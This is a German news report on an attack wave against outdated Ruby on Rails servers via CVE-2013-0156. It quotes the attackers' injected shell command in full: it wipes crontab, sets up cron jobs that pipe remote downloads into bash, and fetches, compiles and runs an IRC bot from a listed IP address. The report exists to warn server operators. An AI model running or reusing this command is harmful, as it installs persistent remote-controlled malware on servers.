Angriffswelle auf Ruby on Rails

Cyber-Kriminelle versuchen seit einigen Tagen vermehrt, Server durch eine Sicherheitslücke im Web Application Framework Ruby on Rails (RoR) zu kompromittieren. Gelingt dies, richten die Eindringlinge einen Bot ein, der anschließend in einem IRC-Channel auf neue Befehle wartet.

Der Sicherheitsexperte Jeff Jarmoc berichtet in seinem Blog, dass die Ganoven versuchen, eine der Schwachstellen auszunutzen, denen die CVE-Nummer 2013-0156 zugewiesen ist. Obwohl die Lücken bereits im Januar geschlossen wurden, dürften sich immer noch mehr als genug Server im Netz finden, auf denen eine veraltete RoR-Version läuft. Laut Jarmon versuchen die Angreifer die folgenden Befehle einzuschleusen:

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

Das führt unter anderem dazu, dass der Bot (k.c) heruntergeladen, kompiliert und schließlich ausgeführt wird. Den Quellcode des Bots hat der Sicherheitsexperte in seinem Blog veröffentlicht. "k" versucht einen IRC-Server namens cvv4you.ru zu kontaktieren und dort den Channel #rails zu betreten. Dort wartet der Bot auf neue Befehle. Laut Jarmos kann k auf Kommando beliebigen weiteren Code nachladen und ausführen. Der IRC-Server ist inzwischen – zumindest über diese Adresse – nicht mehr erreichbar.

Der Bot taucht mit dem Namen – bash in der Prozessliste auf. Darüber hinaus erstellt er bei seinem Start eine Datei namens /tmp/tan.pid, um sicherzustellen, dass nur eine Instanz von ihm ausgeführt wird. Wer einen Server mit Ruby on Rails betreibt, sollte sicherstellen, dass darauf stets eine aktuelle RoR-Version installiert ist. Die aktuellen Versionsnummern lauten 3.2.13, 3.1.12, und 2.3.18 (rei)